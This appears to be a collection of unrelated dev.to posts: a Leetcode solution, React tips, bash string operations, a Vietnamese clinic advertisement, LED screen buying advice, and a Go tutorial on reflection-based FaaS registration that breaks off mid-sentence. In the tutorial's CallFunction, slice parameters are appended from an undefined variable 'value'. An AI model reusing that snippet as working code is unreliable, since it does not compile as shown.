One of the problems on the "Leetcode 75" interview preparedness set is the Merge Strings Alternately problem. In this problem, solvers are tasked with merging 2 strings together, one letter at a time, to form a new one. We can look at an example to better understand this problem: Word 1: "Aa" Word 2: "Bb" Our resulting string here should be "ABab". --- This problem fits into 2 general types of problems when you solve it. First, it's a string manipulation problem. These can be relatively common in interviews due to them typically being slightly easier to explain to candidates. The other category this problem falls into is the general category of "Two pointer" problems. These problems are ones which are best solved by maintaining 2 references to locations in a data structure, such as lists or strings. The key to solving these types of problems is understanding when a given pointer needs to move and change its spot. --- So, how do you solve this problem? Let's start by deciding what to do with each step. Because want to alternate letters in the string, we recognize we need to maintain 3 separate pieces of data. First, which letter we're at in the first string. Second, which letter we're at in the second string. Third, which string we need to look at. `index1, index2 = 0, 0 word = 0` We can use word as an even or odd to determine which word we want to work off of. Once we have these in place, it's a simple matter of alternating the word we pull a letter off of and constructing the string. In the end, one valid solution can look like this: `class Solution: def mergeAlternately(self, word1: str, word2: str) -> str: resultString = "" index1, index2 = 0, 0 count = 0 while index1 < len(word1) and index2 < len(word2): if count % 2 == 0: resultString += word1[index1] index1 += 1 else: resultString += word2[index2] index2 += 1 count += 1 if index1 < len(word1): resultString += word1[index1:] elif index2 < len(word2): resultString += word2[index2:] return resultString`
bgier
1,907,085
Mastering React Rendering: Tips, Tricks, and Best Practices
Understanding React Rendering React rendering is the process of converting your components into...
0
2024-07-01T03:01:37
https://dev.to/pawanupadhyay10/mastering-react-rendering-tips-tricks-and-best-practices-1f84
webdev, react, programming, frontend
**Understanding React Rendering** React rendering is the process of converting your components into actual HTML elements that are displayed in the browser. But it's not just about generating HTML – React's rendering engine is designed to minimize the number of DOM mutations, ensuring that your app stays fast and responsive. The rendering process involves the Virtual DOM, a lightweight in-memory representation of your component tree. When your components change, React updates the Virtual DOM, then efficiently updates the real DOM by comparing the two and only making the necessary changes. This process is called **reconciliation**. **Optimization Techniques** So, how can you optimize your React rendering for better performance? Here are some tips: - **Memoization**: Use React.memo to memoize functional components and prevent unnecessary re-renders. - **shouldComponentUpdate()**: Implement this lifecycle method to control whether your component should update or not. - **Use immutable data structures**: Immutable data structures help React detect changes more efficiently, reducing unnecessary re-renders. **Best Practices** Here are some best practices to keep in mind when writing rendering code: - **Keep your components simple and focused**: Avoid complex logic in your components – keep them simple and focused on rendering. - **Use a consistent coding style**: Follow a consistent coding style to make your code readable and maintainable. - **Use React DevTools**: Use React DevTools to inspect your component tree and debug rendering issues. **Conclusion** Mastering React rendering takes time and practice, but with these tips, tricks, and best practices, you'll be well on your way to building fast, efficient, and scalable applications. Share your own experiences and tips in the comments below, and happy coding!
pawanupadhyay10
1,907,064
Rotating Dodecahedron
Check out this Pen I made!
0
2024-07-01T02:37:42
https://dev.to/dan52242644dan/rotating-dodecahedron-1367
codepen
Check out this Pen I made! {% codepen https://codepen.io/Dancodepen-io/pen/pomXqLV %}
dan52242644dan
1,907,084
Bash string manipulation
In bash, there are several string manipulation operations that can be used to remove parts...
0
2024-07-01T03:01:28
https://dev.to/abbazs/bash-string-manipulation-1fn9
bash, string, manipulation, systemcommands
## In bash, there are several string manipulation operations that can be used to remove parts of a string based on patterns. Here are some of the most commonly used ones - **`${variable#pattern}`**: - Removes the shortest match of `pattern` from the beginning of `variable`. ```bash x="abc.def.ghi" echo ${x#*.} # Outputs: def.ghi ``` - **`${variable##pattern}`**: - Removes the longest match of `pattern` from the beginning of `variable`. ```bash x="abc.def.ghi" echo ${x##*.} # Outputs: ghi ``` - **`${variable%pattern}`**: - Removes the shortest match of `pattern` from the end of `variable`. ```bash x="abc.def.ghi" echo ${x%.*} # Outputs: abc.def ``` - **`${variable%%pattern}`**: - Removes the longest match of `pattern` from the end of `variable`. ```bash x="abc.def.ghi" echo ${x%%.*} # Outputs: abc ``` - **`${variable:offset:length}`**: - Extracts a substring from `variable` starting at `offset` and of length `length`. ```bash x="abc.def.ghi" echo ${x:4:3} # Outputs: def ``` - **`${variable/pattern/replacement}`**: - Replaces the first match of `pattern` with `replacement` in `variable`. ```bash x="abc.def.ghi" echo ${x/def/xyz} # Outputs: abc.xyz.ghi ``` - **`${variable//pattern/replacement}`**: - Replaces all matches of `pattern` with `replacement` in `variable`. ```bash x="abc.def.ghi" echo ${x//./-} # Outputs: abc-def-ghi ``` - **`${variable^pattern}`**: - Converts the first character to uppercase (bash 4.0 and above). ```bash x="abc" echo ${x^} # Outputs: Abc ``` - **`${variable^^pattern}`**: - Converts all characters to uppercase (bash 4.0 and above). ```bash x="abc" echo ${x^^} # Outputs: ABC ``` - **`${variable,pattern}`**: - Converts the first character to lowercase (bash 4.0 and above). ```bash x="ABC" echo ${x,} # Outputs: aBC ``` - **`${variable,,pattern}`**: - Converts all characters to lowercase (bash 4.0 and above). ```bash x="ABC" echo ${x,,} # Outputs: abc ``` These operations provide a powerful and flexible way to manipulate strings directly within bash scripts, allowing for efficient and concise code.
abbazs
1,907,083
DẤU HIỆU BỊ VIÊM NHIỄM PHỤ KHOA
Viêm nhiễm phụ khoa là một vấn đề sức khỏe phổ biến ở phụ nữ, gây ra nhiều khó chịu và ảnh hưởng đến...
0
2024-07-01T03:01:15
https://dev.to/phongkhamdakhoa52ngu/dau-hieu-bi-viem-nhiem-phu-khoa-2kid
Viêm nhiễm phụ khoa là một vấn đề sức khỏe phổ biến ở phụ nữ, gây ra nhiều khó chịu và ảnh hưởng đến chất lượng cuộc sống. Việc nhận biết sớm các dấu hiệu viêm nhiễm phụ khoa giúp điều trị kịp thời và tránh các biến chứng nguy hiểm. Dưới đây là những dấu hiệu thường gặp của viêm nhiễm phụ khoa mà bạn cần lưu ý: 1. Khí Hư Bất Thường Khí hư (hay còn gọi là dịch âm đạo) là hiện tượng tự nhiên ở phụ nữ. Tuy nhiên, khi khí hư có những biểu hiện bất thường như màu sắc, mùi hoặc số lượng thay đổi, đó có thể là dấu hiệu của viêm nhiễm phụ khoa: Màu sắc: Khí hư chuyển sang màu vàng, xanh, xám, hoặc có máu. Mùi: Khí hư có mùi hôi khó chịu, tanh. Số lượng: Khí hư ra nhiều hơn bình thường, gây cảm giác ẩm ướt liên tục. 2. Ngứa Ngáy, Rát Bỏng Vùng Kín Cảm giác ngứa ngáy hoặc rát bỏng ở vùng kín là một dấu hiệu điển hình của viêm nhiễm phụ khoa. Nguyên nhân có thể do nhiễm nấm, vi khuẩn hoặc các tác nhân gây kích ứng khác. 3. Đau Khi Quan Hệ Tình Dục Nếu bạn cảm thấy đau, rát hoặc khó chịu khi quan hệ tình dục, đó cũng có thể là dấu hiệu của viêm nhiễm phụ khoa. Triệu chứng này thường đi kèm với khô hạn, giảm tiết dịch âm đạo. 4. Đi Tiểu Đau, Buốt Viêm nhiễm phụ khoa có thể gây ra viêm niệu đạo, dẫn đến các triệu chứng như đau, buốt khi đi tiểu, tiểu rắt hoặc tiểu nhiều lần trong ngày. 5. Sưng Đỏ, Viêm Nhiễm Bên Ngoài Vùng Kín Vùng kín bị sưng đỏ, viêm nhiễm, hoặc có những nốt mẩn đỏ, phồng rộp là dấu hiệu cảnh báo viêm nhiễm phụ khoa. Đây là biểu hiện của sự phản ứng viêm tại chỗ do vi khuẩn, nấm hoặc virus. 6. Cảm Giác Khó Chịu, Nặng Nề Vùng Chậu Một số trường hợp viêm nhiễm phụ khoa nghiêm trọng có thể gây ra cảm giác đau nhức, nặng nề ở vùng chậu, đau lưng dưới hoặc cảm giác khó chịu toàn thân. Phòng khám đa khoa 52 Nguyễn Trãi nổi bật với dịch vụ thăm khám viêm nhiễm phụ khoa nhanh chóng và chính xác. Với đội ngũ bác sĩ chuyên khoa giàu kinh nghiệm cùng trang thiết bị hiện đại, phòng khám đảm bảo quy trình khám và chẩn đoán được thực hiện một cách tỉ mỉ và chuyên nghiệp. Kết quả thăm khám được phân tích kỹ lưỡng, từ đó đưa ra các biện pháp điều trị phù hợp nhất cho từng bệnh nhân. Các phương pháp điều trị tại đây không chỉ hiệu quả mà còn đảm bảo an toàn, giúp bệnh nhân yên tâm và phục hồi nhanh chóng. >>> Xem thêm: Làm sao để không bị viêm nhiễm phụ khoa
phongkhamdakhoa52ngu
1,907,082
How to distinguish the quality of LED transparent screens
With the rapid development of transparent LED display technology, many LED transparent screen...
0
2024-07-01T03:00:34
https://dev.to/sostrondylan/how-to-distinguish-the-quality-of-led-transparent-screens-1ilm
led, transparent, screen
With the rapid development of transparent LED display technology, many [LED transparent screen manufacturers](https://sostron.com/products/crystal-transparent-led-screen/) have emerged in the market. Faced with a wide range of products, how can consumers distinguish the quality of their products? This article will provide you with some practical judgment criteria to help you select LED transparent screens with superior performance. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kxrn77p1w0ryzyvc40x2.png) Brightness comparison: the balance between vision and demand First of all, brightness is an important indicator for measuring the performance of [LED transparent screens](url). When comparing brightness, you can place LED modules of different brands next to the same number of LED modules, and then gradually increase the observation distance to observe whether the brightness of the lamp beads meets your requirements. The higher the brightness, the higher the cost, but it is suitable for environments that require high brightness, such as outdoor or window. On the contrary, low-brightness LED transparent screens are suitable for pure indoor environments. [Here is the knowledge about nit brightness. ](https://sostron.com/knowledge-of-nit-brightness/) Light uniformity and color difference: details determine success or failure Observing whether the light of LED lamp beads is uniform is another key point to judge its quality. Especially when observing white light, the presence of color difference will seriously affect the display effect. In order to observe the color difference more accurately, it is recommended to cover the screen with an acrylic sheet of a certain thickness, so that the potential color difference problem can be more clearly found. [Here are 3 types of LED lamp bead specifications. ](https://sostron.com/introducing-3-types-of-led-lamp-bead-specifications-for-you/) Wire identification: the embodiment of intrinsic quality High-quality wires are not only UL certified, but the number of internal wire cores is also a criterion for judging their quality. Generally, the more wire cores, the better the quality of the wire. By removing the outer skin of the wire and counting the number of internal wire cores, the quality of the wire can be intuitively evaluated. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8v361c7g8zflhxh2zqek.png) Lamp bead temperature: a touchstone of stability After the LED lamp bead has been working for a period of time, touch its surface with your hand and feel its temperature. If the temperature is too high, it may mean poor heat dissipation, which will affect the stability and service life of the LED transparent screen. [Take you to understand the working principle of LED lamp beads. ](https://sostron.com/the-working-principle-of-led-lamp-beads/) Solder point quality: a direct reflection of the process level The quality of the solder point directly reflects the level of the welding process. A good solder point should be full and white, which indicates that the solder is used properly. On the contrary, if there is a cold solder joint, it may cause poor contact and increase the subsequent maintenance cost. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2cpj0paoudyvlvo4ysqv.png) Fluorescent lamp mode: the choice of technical route There are two main methods for making LED transparent screens: positive light emission and side light emission. Although the side light emission mode has a higher penetration rate, its lamp bead packaging technology still needs further market verification. The positive light emission mode uses traditional LED display lamp beads that have been tested by the market, and its quality is more stable and reliable. [Let you understand the working principle and production process of LED transparent film. ](https://sostron.com/working-principle-and-manufacturing-process-of-led-transparent-film/) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ll6bwnrgptgqhlru83n9.png) Conclusion To choose a high-quality LED transparent screen, you should not only consider its brightness, light uniformity, color difference, wire quality, lamp bead temperature and solder joint process, but also pay attention to its fluorescent light mode. Through these detailed comparisons and considerations, you can more wisely choose the LED transparent screen product that suits your needs. Remember, when choosing a transparent screen, quality is always more important than price. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fqjbgqhiwjmzqw4v58cc.png) Thank you for watching. I hope we can solve your problems. Sostron is a professional [LED display manufacturer](https://sostron.com/about-us/). We provide all kinds of displays, display leasing and display solutions around the world. If you want to know: [Teach you how to choose LED transparent screen correctly.](https://dev.to/sostrondylan/teach-you-how-to-choose-led-transparent-screen-correctly-107k) Please click read. Follow me! Take you to know more about led display knowledge. Contact us on WhatsApp:https://api.whatsapp.com/send?phone=+8613570218702&text=Hello
sostrondylan
1,907,071
(Part 11)Golang Framework Hands-on - Adaptive Registration of FaaS Parameter Types Based on Reflection
Github: https://github.com/aceld/kis-flow Document:...
0
2024-07-01T02:54:05
https://dev.to/aceld/part-11golang-framework-hands-on-adaptive-registration-of-faas-parameter-types-based-on-reflection-15i9
go
<img width="150px" src="https://github.com/aceld/kis-flow/assets/7778936/8729d750-897c-4ba3-98b4-c346188d034e" /> Github: https://github.com/aceld/kis-flow Document: https://github.com/aceld/kis-flow/wiki --- [Part1-OverView](https://dev.to/aceld/part-1-golang-framework-hands-on-kisflow-streaming-computing-framework-overview-8fh) [Part2.1-Project Construction / Basic Modules](https://dev.to/aceld/part-2-golang-framework-hands-on-kisflow-streaming-computing-framework-project-construction-basic-modules-cia) [Part2.2-Project Construction / Basic Modules](https://dev.to/aceld/part-3golang-framework-hands-on-kisflow-stream-computing-framework-project-construction-basic-modules-1epb) [Part3-Data Stream](https://dev.to/aceld/part-4golang-framework-hands-on-kisflow-stream-computing-framework-data-stream-1mbd) [Part4-Function Scheduling](https://dev.to/aceld/part-5golang-framework-hands-on-kisflow-stream-computing-framework-function-scheduling-4p0h) [Part5-Connector](https://dev.to/aceld/part-5golang-framework-hands-on-kisflow-stream-computing-framework-connector-hcd) [Part6-Configuration Import and Export](https://dev.to/aceld/part-6golang-framework-hands-on-kisflow-stream-computing-framework-configuration-import-and-export-47o1) [Part7-KisFlow Action](https://dev.to/aceld/part-7golang-framework-hands-on-kisflow-stream-computing-framework-kisflow-action-3n05) [Part8-Cache/Params Data Caching and Data Parameters](https://dev.to/aceld/part-8golang-framework-hands-on-cacheparams-data-caching-and-data-parameters-5df5) [Part9-Multiple Copies of Flow](https://dev.to/aceld/part-8golang-framework-hands-on-multiple-copies-of-flow-c4k) [Part10-Prometheus Metrics Statistics](https://dev.to/aceld/part-10golang-framework-hands-on-prometheus-metrics-statistics-22f0) [Part11-Adaptive Registration of FaaS Parameter Types Based on Reflection](https://dev.to/aceld/part-11golang-framework-hands-on-adaptive-registration-of-faas-parameter-types-based-on-reflection-15i9) --- [Case1-Quick Start](https://dev.to/aceld/case-i-kisflow-golang-stream-real-time-computing-quick-start-guide-f51) --- Next, we will enhance the Function in KisFlow to better focus on processing business data. We will change the previous Function implementation: ```go func FuncDemo3Handler(ctx context.Context, flow kis.Flow) error { fmt.Println("---> Call funcName3Handler ----") fmt.Printf("Params = %+v\n", flow.GetFuncParamAll()) for _, row := range flow.Input() { str := fmt.Sprintf("In FuncName = %s, FuncId = %s, row = %s", flow.GetThisFuncConf().FName, flow.GetThisFunction().GetId(), row) fmt.Println(str) } return nil } ``` In this implementation, raw data is obtained from `flow.Input()`. We will modify it so that the business can directly obtain the specific data structure type it wants without assertions and type conversions. The modified Function extended parameter usage is roughly as follows: > proto ```go type StuScores struct { StuId int `json:"stu_id"` Score1 int `json:"score_1"` Score2 int `json:"score_2"` Score3 int `json:"score_3"` } type StuAvgScore struct { StuId int `json:"stu_id"` AvgScore float64 `json:"avg_score"` } ``` > FaaS ```go type AvgStuScoreIn struct { serialize.DefaultSerialize proto.StuScores } type AvgStuScoreOut struct { serialize.DefaultSerialize proto.StuAvgScore } // AvgStuScore(FaaS) calculates the average score of students func AvgStuScore(ctx context.Context, flow kis.Flow, rows []*AvgStuScoreIn) error { for _, row := range rows { avgScore := proto.StuAvgScore{ StuId: row.StuId, AvgScore: float64(row.Score1+row.Score2+row.Score3) / 3, } // Commit the result data _ = flow.CommitRow(AvgStuScoreOut{StuAvgScore: avgScore}) } return nil } ``` In this way, we can directly obtain the desired target output structure data through the third parameter `rows`, without needing assertions and conversions, thereby focusing more on the business-side development efficiency. Of course, if you want to obtain the raw data, you can still get it from `flow.Input()`. This chapter will implement the above functionality in KisFlow. ## 11.1 Self-Describing FaaS Business Callback Functions In this section, we will complete the conceptual transformation for self-describing FaaS. Previously, the FaaS callback was defined as: ```go type FaaS func(context.Context, Flow) error ``` We need a structure to describe this function's properties, including its name, address, number of parameters, parameter types, return type, etc. ### 11.1.1 FaaSDesc: Self-Describing Callback Type Create a new file faas.go under `kis-flow/kis/` and define the following structure: > kis-flow/kis/faas.go ```go // FaaS: Function as a Service // Change // type FaaS func(context.Context, Flow) error // to // type FaaS func(context.Context, Flow, ...interface{}) error // to allow data transmission through arbitrary input types in variadic parameters type FaaS interface{} // FaaSDesc: Description of the FaaS callback business function type FaaSDesc struct { FnName string // Function name f interface{} // FaaS function fName string // Function name ArgsType []reflect.Type // List of function parameter types ArgNum int // Number of function parameters FuncType reflect.Type // Function type FuncValue reflect.Value // Function value (function address) } ``` The previous FaaS type is improved to `interface{}`, and `FaaSDesc` now has some attributes. * `FnName`: Indicates the name of the current function, such as "funcDemo1" in our previous examples. This is used to identify the function in KisFlow. * `f`: The defined FaaS function. * `fName`: The name of the function defined by f. ArgsType: The list of parameter types of the defined f function, which is a slice. * `ArgNum`: The number of input parameters of the defined f function. * `FuncType`: The data type of the defined f function. * `FuncValue`: The value of the defined `f function (address of the schedulable function)`. ### 11.1.2 Create a New FaaSDesc Object Below is a constructor function for creating a FaaSDesc object. The parameter types are the FunctionName in KisFlow and the defined FaaS function: > kis-flow/kis/faas.go ```go // NewFaaSDesc creates a FaaSDesc instance based on the registered FnName and FaaS callback function func NewFaaSDesc(fnName string, f FaaS) (*FaaSDesc, error) { // The callback function FaaS, function value (function address) funcValue := reflect.ValueOf(f) // The type of the callback function FaaS funcType := funcValue.Type() // Check if the provided FaaS pointer is a function type if !isFuncType(funcType) { return nil, fmt.Errorf("provided FaaS type is %s, not a function", funcType.Name()) } // Check if the provided FaaS function has exactly one return value of type error if funcType.NumOut() != 1 || funcType.Out(0) != reflect.TypeOf((*error)(nil)).Elem() { return nil, errors.New("function must have exactly one return value of type error") } // The list of parameter types of the FaaS function argsType := make([]reflect.Type, funcType.NumIn()) // Get the name of the FaaS function fullName := runtime.FuncForPC(funcValue.Pointer()).Name() // Ensure the parameter list of FaaS func(context.Context, Flow, ...interface{}) error includes context.Context and kis.Flow // Check if the parameter list includes kis.Flow containsKisFlow := false // Check if the parameter list includes context.Context containsCtx := false // Iterate over the parameter types of the FaaS function for i := 0; i < funcType.NumIn(); i++ { // Get the type of the i-th parameter paramType := funcType.In(i) if isFlowType(paramType) { // Check if the parameter list includes kis.Flow containsKisFlow = true } else if isContextType(paramType) { // Check if the parameter list includes context.Context containsCtx = true } else if isSliceType(paramType) { // Check if the parameter list includes a slice type // Get the element type of the current slice parameter itemType := paramType.Elem() // If the current parameter is a pointer type, get the type of the structure it points to if itemType.Kind() == reflect.Ptr { itemType = itemType.Elem() // Get the type of the structure it points to } } else { // Other types are not supported... } // Append the current parameter type to the argsType list argsType[i] = paramType } if !containsKisFlow { // If the parameter list does not include kis.Flow, return an error return nil, errors.New("function parameters must have kis.Flow param, please use FaaS type like: [type FaaS func(context.Context, Flow, ...interface{}) error]") } if !containsCtx { // If the parameter list does not include context.Context, return an error return nil, errors.New("function parameters must have context, please use FaaS type like: [type FaaS func(context.Context, Flow, ...interface{}) error]") } // Return the FaaSDesc instance return &FaaSDesc{ FnName: fnName, f: f, fName: fullName, ArgsType: argsType, ArgNum: len(argsType), FuncType: funcType, FuncValue: funcValue, }, nil } ``` Here, we use reflection to get the related attribute values from the `f` function and store them in `FaaSDesc`. To ensure that the provided `FaaS` function meets the following format: ```go type FaaS func(context.Context, Flow, ...interface{}) error ``` We perform strict type checks on the `context.Context` and Flow parameters. The checking methods are as follows: > kis-flow/kis/faas.go ```go // isFuncType checks if the provided paramType is a function type func isFuncType(paramType reflect.Type) bool { return paramType.Kind() == reflect.Func } // isFlowType checks if the provided paramType is of type kis.Flow func isFlowType(paramType reflect.Type) bool { var flowInterfaceType = reflect.TypeOf((*Flow)(nil)).Elem() return paramType.Implements(flowInterfaceType) } // isContextType checks if the provided paramType is of type context.Context func isContextType(paramType reflect.Type) bool { typeName := paramType.Name() return strings.Contains(typeName, "Context") } // isSliceType checks if the provided paramType is a slice type func isSliceType(paramType reflect.Type) bool { return paramType.Kind() == reflect.Slice } ``` In `NewFaaSDesc()`, we use two boolean variables, `containsKisFlow` and `containsCtx`, to check whether the parameter list includes `Context` and Flow types. The following code ensures compatibility when the parameter type is a structure pointer: ```go // ... ... // Get the current parameter type itemType := paramType.Elem() // If the current parameter is a pointer type, get the type of the structure it points to if itemType.Kind() == reflect.Ptr { itemType = itemType.Elem() // Get the type of the structure it points to } // ... ... ``` For example, the developer might define the FaaS function prototype as follows: ```go func MyFaaSDemo(ctx context.Context, flow Flow, []*A) error ``` or: ```go func MyFaaSDemo(ctx context.Context, flow Flow, []A) error ``` ### 11.1.3 Registering FaaS Functions Next, we will modify the method for registering `FaaS` functions in the `kisPool` module to register a FaaSDesc description. The modified registration method is as follows: > kis-flow/kis/pool.go ```go // FaaS registers a Function's business logic, indexed and registered by Function Name func (pool *kisPool) FaaS(fnName string, f FaaS) { // When registering a FaaS logic callback, create a FaaSDesc description object faaSDesc, err := NewFaaSDesc(fnName, f) if err != nil { panic(err) } pool.fnLock.Lock() // Write lock defer pool.fnLock.Unlock() if _, ok := pool.fnRouter[fnName]; !ok { // Register the FaaSDesc description object into fnRouter pool.fnRouter[fnName] = faaSDesc } else { errString := fmt.Sprintf("KisPool FaaS Repeat FuncName=%s", fnName) panic(errString) } log.Logger().InfoF("Add KisPool FuncName=%s", fnName) } ``` Now, the key in `fnRouter` remains the FunctionName, but the value is the FaaSDesc description object for the current FaaS function. ### 11.1.4 Dispatching FaaSDesc in kisPool Finally, when scheduling a function, use FaaSDesc to retrieve the function address and parameter list for scheduling. The modified `CallFunction()` is as follows: > kis-flow/kis/pool.go ```go // CallFunction dispatches a Function func (pool *kisPool) CallFunction(ctx context.Context, fnName string, flow Flow) error { if funcDesc, ok := pool.fnRouter[fnName]; ok { // Parameter list for the scheduled function params := make([]reflect.Value, 0, funcDesc.ArgNum) for _, argType := range funcDesc.ArgsType { // If it's a Flow type parameter, pass the value of flow if isFlowType(argType) { params = append(params, reflect.ValueOf(flow)) continue } // If it's a Context type parameter, pass the value of ctx if isContextType(argType) { params = append(params, reflect.ValueOf(ctx)) continue } // If it's a Slice type parameter, pass the value of flow.Input() if isSliceType(argType) { params = append(params, value) continue } // If the parameter is neither Flow, Context, nor Slice type, give it the zero value params = append(params, reflect.Zero(argType)) } // Invoke the logic of the current function retValues := funcDesc.FuncValue.Call(params) // Retrieve the first return value; if nil, return nil ret := retValues[0].Interface() if ret == nil { return nil } // If the return value is of error type, return the error return retValues[0].Interface().(error) } log.Logger().ErrorFX(ctx, "FuncName: %s Cannot find in KisPool, Not Added.\n", fnName) return errors.New("FuncName: " + fnName + " Cannot find in KisPool, Not Added.") } ``` The overall scheduling logic of the function is roughly as follows: First, use fnName to route to the corresponding FaaSDesc from fnRouter. Iterate over the parameter list of FaaSDesc: Extract the Context and Flow objects, extract the custom slice parameters passed in, and if the parameter is neither Flow, Context, nor Slice type, give it the zero value as shown below: ```go params = append(params, reflect.Zero(argType)) ``` Finally, execute the function scheduling: ```go retValues := funcDesc.FuncValue.Call(params) ``` Obtain the value of the first return value error; if it is nil, return nil, otherwise return the error type. In this way, we have successfully established the self-describing scheduling mode for FaaS. With this functionality, what can KisFlow do? In the next section, we can serialize the custom parameter data types passed in when scheduling FaaSDesc to obtain the data types expected by the developer. ## 11.2 Custom Data Type Serialization for FaaS Parameters ### 11.2.1 Serialize Interface First, let's define a data serialization interface. Create a file named `serialize.go` under `kis-flow/kis/` as follows: > kis-flow/kis/serialize.go ```go // Serialize Data Serialization Interface type Serialize interface { // UnMarshal is used to deserialize KisRowArr into a specified type value. UnMarshal(common.KisRowArr, reflect.Type) (reflect.Value, error) // Marshal is used to serialize a specified type value into KisRowArr. Marshal(interface{}) (common.KisRowArr, error) } ``` Here, `KisRowArr` is the data slice that we pass to each function in KisFlow, previously defined in `kis-flow/common/data_type.go`: ```go package common // KisRow represents a row of data type KisRow interface{} // KisRowArr represents a batch of data for a single business process type KisRowArr []KisRow /* KisDataMap holds all data carried by the current flow key : the Function ID where the data resides value: the corresponding KisRow */ type KisDataMap map[string]KisRowArr ``` The `Serialize` interface provides two methods: * `UnMarshal`: Used to deserialize `KisRowArr` into a specified type value. * `Marshal`: Used to serialize a specified type value into `KisRowArr`. KisFlow will provide a default `Serialize` implementation for each `FaaS` function, but developers can also customize their own Serialize implementations to perform custom data serialization actions on `FaaS` parameters. ### 11.2.2 Default Serialization in KisFlow `KisFlow` provides a default Serialize implementation, primarily in JSON format. Create a serialize folder under `kis-flow/`, and then create a file named `serialize_default.go` under `kis-flow/serialize/` with the following code for serialization and deserialization: > kis-flow/serialize/serialize_default.go ```go package serialize import ( "encoding/json" "fmt" "kis-flow/common" "reflect" ) type DefaultSerialize struct{} // UnMarshal is used to deserialize KisRowArr into a specified type value. func (f *DefaultSerialize) UnMarshal(arr common.KisRowArr, r reflect.Type) (reflect.Value, error) { // Ensure the input type is a slice if r.Kind() != reflect.Slice { return reflect.Value{}, fmt.Errorf("r must be a slice") } slice := reflect.MakeSlice(r, 0, len(arr)) // Iterate over each element and attempt deserialization for _, row := range arr { var elem reflect.Value var err error // Attempt to assert as a struct or pointer elem, err = unMarshalStruct(row, r.Elem()) if err == nil { slice = reflect.Append(slice, elem) continue } // Attempt to directly deserialize a string elem, err = unMarshalJsonString(row, r.Elem()) if err == nil { slice = reflect.Append(slice, elem) continue } // Attempt to serialize to JSON and then deserialize elem, err = unMarshalJsonStruct(row, r.Elem()) if err == nil { slice = reflect.Append(slice, elem) } else { return reflect.Value{}, fmt.Errorf("failed to decode row: %v", err) } } return slice, nil } // Marshal is used to serialize a specified type value into KisRowArr (JSON serialization). func (f *DefaultSerialize) Marshal(i interface{}) (common.KisRowArr, error) { var arr common.KisRowArr switch reflect.TypeOf(i).Kind() { case reflect.Slice, reflect.Array: slice := reflect.ValueOf(i) for i := 0; i < slice.Len(); i++ { // Serialize each element to a JSON string and add it to the slice. jsonBytes, err := json.Marshal(slice.Index(i).Interface()) if err != nil { return nil, fmt.Errorf("failed to marshal element to JSON: %v", err) } arr = append(arr, string(jsonBytes)) } default: // If not a slice or array type, serialize the entire structure to a JSON string. jsonBytes, err := json.Marshal(i) if err != nil { return nil, fmt.Errorf("failed to marshal element to JSON: %v", err) } arr = append(arr, string(jsonBytes)) } return arr, nil } ``` Some helper functions are defined as follows: > kis-flow/serialize/serialize_default.go ```go // Attempt to assert as a struct or pointer func unMarshalStruct(row common.KisRow, elemType reflect.Type) (reflect.Value, error) { // Check if row is a struct or struct pointer type rowType := reflect.TypeOf(row) if rowType == nil { return reflect.Value{}, fmt.Errorf("row is nil pointer") } if rowType.Kind() != reflect.Struct && rowType.Kind() != reflect.Ptr { return reflect.Value{}, fmt.Errorf("row must be a struct or struct pointer type") } // If row is a pointer type, get its underlying type if rowType.Kind() == reflect.Ptr { // Null pointer if reflect.ValueOf(row).IsNil() { return reflect.Value{}, fmt.Errorf("row is nil pointer") } // Dereference row = reflect.ValueOf(row).Elem().Interface() // Get the type after dereferencing rowType = reflect.TypeOf(row) } // Check if row can be asserted to elemType (target type) if !rowType.AssignableTo(elemType) { return reflect.Value{}, fmt.Errorf("row type cannot be asserted to elemType") } // Convert row to reflect.Value and return return reflect.ValueOf(row), nil } // Attempt to directly deserialize a string (deserialize JSON string to struct) func unMarshalJsonString(row common.KisRow, elemType reflect.Type) (reflect.Value, error) { // Check if the source data can be asserted as a string str, ok := row.(string) if !ok { return reflect.Value{}, fmt.Errorf("not a string") } // Create a new struct instance to store the deserialized value elem := reflect.New(elemType).Elem() // Attempt to deserialize the JSON string into the struct. if err := json.Unmarshal([]byte(str), elem.Addr().Interface()); err != nil { return reflect.Value{}, fmt.Errorf("failed to unmarshal string to struct: %v", err) } return elem, nil } // Attempt to serialize to JSON and then deserialize (convert struct to JSON string, then deserialize JSON string to struct) func unMarshalJsonStruct(row common.KisRow, elemType reflect.Type) (reflect.Value, error) { // Serialize row to JSON string jsonBytes, err := json.Marshal(row) if err != nil { return reflect.Value{}, fmt.Errorf("failed to marshal row to JSON: %v", err) } // Create a new struct instance to store the deserialized value elem := reflect.New(elemType).Interface() // Deserialize the JSON string into the struct if err := json.Unmarshal(jsonBytes, elem); err != nil { return reflect.Value{}, fmt.Errorf("failed to unmarshal JSON to element: %v", err) } return reflect.ValueOf(elem).Elem(), nil } ``` * `UnMarshal()`: First checks if the parameter is a slice. If it is, it serializes each element in the slice. It first tries to deserialize using `unMarshalStruct()`, then `unMarshalJsonString()`, and finally `unMarshalJsonStruct()` if the previous attempts fail. * `Marshal()`: Serializes any type into a JSON binary string stored in KisRowArr. > Note: The current default serialization in KisFlow only implements JSON serialization. Developers can refer to `DefaultSerialize{}` to implement their own serialization and deserialization for other formats. ### 11.2.3 Default Serialize Instance Define a global default serialization instance, `defaultSerialize`, in the `serialize` interface definition. > kis-flow/kis/serialize.go ```go // defaultSerialize is the default serialization implementation provided by KisFlow (developers can customize) var defaultSerialize = &serialize.DefaultSerialize{} ``` Also, provide a method to check if a data type implements the Serialize interface: > kis-flow/kis/serialize.go ```go // isSerialize checks if the passed paramType implements the Serialize interface func isSerialize(paramType reflect.Type) bool { return paramType.Implements(reflect.TypeOf((*Serialize)(nil)).Elem()) } ``` ### 11.2.4 Implementing the Serialize Interface for FaaSDesc Next, we will extend `FaaSDesc` to implement the `Serialize` interface. When scheduling a `FaaSDesc`, the input parameters passed to it will be serialized to obtain the corresponding specific type parameters. The definition is as follows: > kis-flow/kis/faas.go ```go // FaaSDesc describes the FaaS callback computation business function type FaaSDesc struct { // +++++++ Serialize // Serialization implementation for the data input and output of the current function // +++++++ FnName string // Function name f interface{} // FaaS function fName string // Function name ArgsType []reflect.Type // Collection of function parameter types ArgNum int // Number of function parameters FuncType reflect.Type // Function type FuncValue reflect.Value // Function value (function address) } ``` Then, in the constructor method `NewFaaSDesc()`, add a check for custom parameters. Determine whether the passed custom parameters implement the two 